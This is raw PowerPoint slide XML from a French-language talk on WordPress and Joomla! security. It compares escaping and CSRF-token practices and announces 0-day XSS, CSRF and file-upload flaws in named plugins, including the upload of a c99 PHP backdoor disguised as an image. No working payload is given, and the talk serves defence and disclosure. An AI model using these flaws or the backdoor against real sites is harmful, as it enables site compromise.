            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>PHP + MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Fork (évolution) du projet b2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>A l’origine du service WordPress.com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smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>14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768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Historique de WordPress</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-CH" sz="3100" dirty="0" smtClean="0"/>
              <a:t>(simplifiée)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH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b="1" dirty="0" smtClean="0"/>
              <a:t>2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>: Version 0.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>: 1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Miles Davis), 1.2 (Charles Mindus)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>: 1.5 (Billy Strayhorn)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>Fin 2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>: 2.0 (Duke Elligton)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>: 2.1 (Ella Fitzgerald </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0"/>
              <a:t>2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>: 2.5 (Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Brecker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>: 2.9 (Carmen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>McRae)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>: 3.0 (Thelonious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Monk)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" b="1" dirty="0" smtClean="0"/>
              <a:t>2011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>: 3.1 (RC 3 sortie fin janvier)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15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38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Sécurité de WordPress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Faille de sécurité critique corrigée le 29 décembre 2010 (version 3.0.4): XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Pas de «Secure Coding Guide» ou équivalent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>OWASP peut aider (cf. références) mais reste générique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>A part «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is an interesting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>topic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>», pas grand-chose sur WordPress.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>La page «Data Validation» est ce qui se rapproche le plus d’un «Coding Guide»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16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753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WordPress: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/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Entrée:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Pas grand chose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Sortie: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>wp_specialchars (déprécié), esc_html, esp_html_e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>attribute_escape (déprécié), esc_attr, esc_attr_e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>clean_url, sanitize_url (déprécié), esc_url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>js_escape (déprécié), esc_js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Note: exactement l’inverse de Joomla! (!)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17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28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XSS: Erreur commune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Code faux:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0"/>
              <a:t>input value="&lt;?php echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp_specialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0"/>
              <a:t>( $xss ); ?&gt;" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>C’est un attribut. Le code correct:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0"/>
              <a:t>&lt;input value="&lt;?php echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attribute_escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0"/>
              <a:t>$xss ); ?&gt;" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Ou mieux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0"/>
              <a:t>&lt;input value="&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esc_attr_e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2400" dirty="0"/>
              <a:t>$xss ); ?&gt;" /&gt;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18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222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WordPress: Téléchargement (upload)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validate_file, et encore (et où est la doc ?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Sinon, rien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smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>19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263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 smtClean="0"/>
              <a:t>Qui sommes-nous?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375476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dirty="0" smtClean="0"/>
              <a:t>Flora Bottaccio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Analyste sécurité (ADVtools)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH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0" y="1916832"/>
            <a:ext cx="3898776" cy="129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C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Sebastien Andrivet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CH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Directeur </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-CH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(ADVtools)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223" y="3284984"/>
            <a:ext cx="762215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Compétences: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2000" dirty="0"/>
              <a:t>Tests d’intrusion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2000" dirty="0"/>
              <a:t>Audits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2000" dirty="0"/>
              <a:t>Forensic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2000" dirty="0"/>
              <a:t>Diagnostic de problèmes (réseau, applications, bases de données, …)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CH" sz="2000" dirty="0"/>
              <a:t>Développements (cryptographie, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" dirty="0" smtClean="0"/>
              <a:t>signatures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="2000" dirty="0"/>
              <a:t>électroniques, …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH" sz="20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2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH" noProof="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0716"/>
            <a:ext cx="104775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10716"/>
            <a:ext cx="104775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WordPress: Injections SQL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intval, absint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>insert, update, prepare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Les données vont être modifiées (escape) pour éviter les injections SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>esc_sql, like_escape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Là encore, c’est l’inverse de Joomla!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20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629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WordPress: Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>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NONCE (Number used once)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Les jetons sont gérés par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>WordPress mais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>c’est au développeur d’ajouter le bon code au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>bon endroit:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>wp_nonce_field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>wp_verify_nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>check_admin_referer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21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891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WordPress - En résumé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Pas de Secure Coding Guide, juste quelques articles ça et là</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Rien n’est automatique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Meilleur que Joomla! contre les injections SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Philosophie diamétralement opposée à Joomla! concernant la validation (entrée versus sortie)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Quand est-il des plug-ins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22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36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En pratique: 0-days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Joomla!:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>CBProfileGallery (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>JoomGallery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>ProjectFork (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>UserPhoto (file injection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Ce choix de plug-ins est totalement arbitraire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smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>23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178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0-day: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>! | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>CBProfileGallery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0768"/>
            <a:ext cx="5737307" cy="4830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24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0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CBProfileGallery - XSS</a:t>
            </a:r>
            <a:endParaRPr lang="fr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0" y="1710252"/>
            <a:ext cx="7373380" cy="4001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25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1481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Pourquoi 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fr-CH" dirty="0" smtClean="0"/>
              <a:t>Joomla! est supposé filtrer les données (JRequest), mais ce composant est basé sur Community Builder (CB), un ensemble d’extensions de Joomla!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>CB court-circuite totalement Joomla! et utilise ses propres méthodes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>_getReqParam (cbGetParam) au lieu de Jrequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Filtre également, mais dans ce cas, le filtrage est déficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Le code laisse penser qu’une injection SQL est également possible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26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16172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OWASP Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Security Verification Standard 2009</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr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29" y="1406549"/>
            <a:ext cx="5073341" cy="48307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27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9223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OWASP Application Security Verification Standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>2009</a:t>
            </a:r>
            <a:endParaRPr lang="fr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32" y="1406549"/>
            <a:ext cx="3856135" cy="48307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28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39821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OWASP Code Review Guide 2008 (1.1)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«Reviewing code for cross-site scripting», page 153 et suivante</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mitigate this type of vulnerability we need to perform a number of security tasks in our code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Validate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. Encode unsafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>output”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29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29563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WordPress, Joomla!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Sécurité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Les plug-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>0-days - Démos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>C99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Q &amp; R</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-CH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3</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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761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OWASP Testing Guide 2008 (3.0)</a:t>
            </a:r>
            <a:endParaRPr lang="fr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88" y="1295400"/>
            <a:ext cx="4497823" cy="4830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30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37069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0-day: Joomla! | ProjectFork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6752"/>
            <a:ext cx="7936823" cy="4830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31</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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19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JoomGallery - CSRF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L’attaque reste limitée dans ce cas précis: attaque uniquement sur un POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Cela ne marche pas sous IE 7/8/9, mais en général très bien sous Firefox (third-party cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Il y a d’autres cas où l’attaque est plus simple: démo suivante</a:t>
            </a:r>
          </a:p>
          <a:p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32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26541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0-day: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Joomla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>JoomGallery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35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33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9639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Attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr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477905" cy="335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own Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7309832">
            <a:off x="2260871" y="4419599"/>
            <a:ext cx="685800" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FC920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34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26245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Après l’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr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3893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35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41894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Pourquoi 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Cette attaque CSRF est cette fois sur un GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Toutes les méthodes du composant sont concernées par les attaques CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Le développeur a oublié le jeton (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>JRequest, par défaut, retourne indifféremment les paramètres POST et GET. Cela augmente la surface d’attaque.</a:t>
            </a:r>
          </a:p>
          <a:p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36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27802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OWASP Application Security Verification Standard 2009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39" y="1406549"/>
            <a:ext cx="5180921" cy="48307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37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33768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OWASP Code Review Guide 2008 (1.1)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“[…] checking if the request has a valid session cookie is not enough, we need check if a unique identifier is sent with every HTTP request sent to the application” (page 163)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38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309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0-day: WordPress | User Photo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08" y="1600200"/>
            <a:ext cx="4823383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39</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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5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WordPress, Joomla!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Ce sont des “Content Management Systems”, des systèmes de gestion de contenu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Avec TYPO3, WordPress et Joomla! sont les leaders du marché des CMS “open-source” en Suisse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Dans le monde, les leaders sont WordPress, Joomla! et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>Drupal</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Les chiffres exactes dépendent du point de vue (les plus installés, les plus utilisés, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr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4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286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Profil</a:t>
            </a:r>
            <a:endParaRPr lang="fr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68760"/>
            <a:ext cx="5311724" cy="496855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40</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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00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Interception de la requête HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="fr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02" y="1600200"/>
            <a:ext cx="5704995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41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7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Backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t> téléchargée</a:t>
            </a:r>
            <a:endParaRPr lang="fr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71" y="1628800"/>
            <a:ext cx="5993058" cy="2088232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55576" y="4293096"/>
            <a:ext cx="7787208" cy="1905075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Le composant n’a pas vu que ce n’était pas une image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr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42</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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8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Backdoor (c99 par exemple)</a:t>
            </a:r>
            <a:endParaRPr lang="fr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18" y="1600200"/>
            <a:ext cx="5212564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43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79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Photo: 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075240" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Il y a aussi un XSS (de type 2)…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962769" cy="37766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44</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-CH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35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Est-ce que User Photo est utilisé ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr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88504"/>
            <a:ext cx="6465888" cy="4876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45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr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902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OWASP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OWASP Testing Guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>OWASP-DV-015 «Incubated vulnerability»</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>OWASP Code Review Guide:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Pas explicitement abordé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>OWASP Application Security Verification Standard:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Pas explicitement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>abordé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46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64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WordPress User Photo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Auteur et mainteneur du composant contacté: pas de réponse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1" smtClean="0"/>
              <a:t>Advisory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t> publié ce matin (17 Février 2011)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Autres composants:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Pas de publication</a:t>
            </a:r>
            <a:endParaRPr lang="fr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Publication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47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noProof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42722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c99: un cheval de Troie dans la backdoor ?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Pour la démo, nous avons utilisé la Backdoor bien connue “c99”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Il en existe de multiples versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Certaines versions sont encryptées pour éviter la détection par des Anti-Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" smtClean="0"/>
              <a:t>Mais certaines versions contiennent quelque chose de plus exotique…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48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4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c99 - images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Ce shell PHP contient ce genre de code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-CH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CH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CH" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>change"=&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
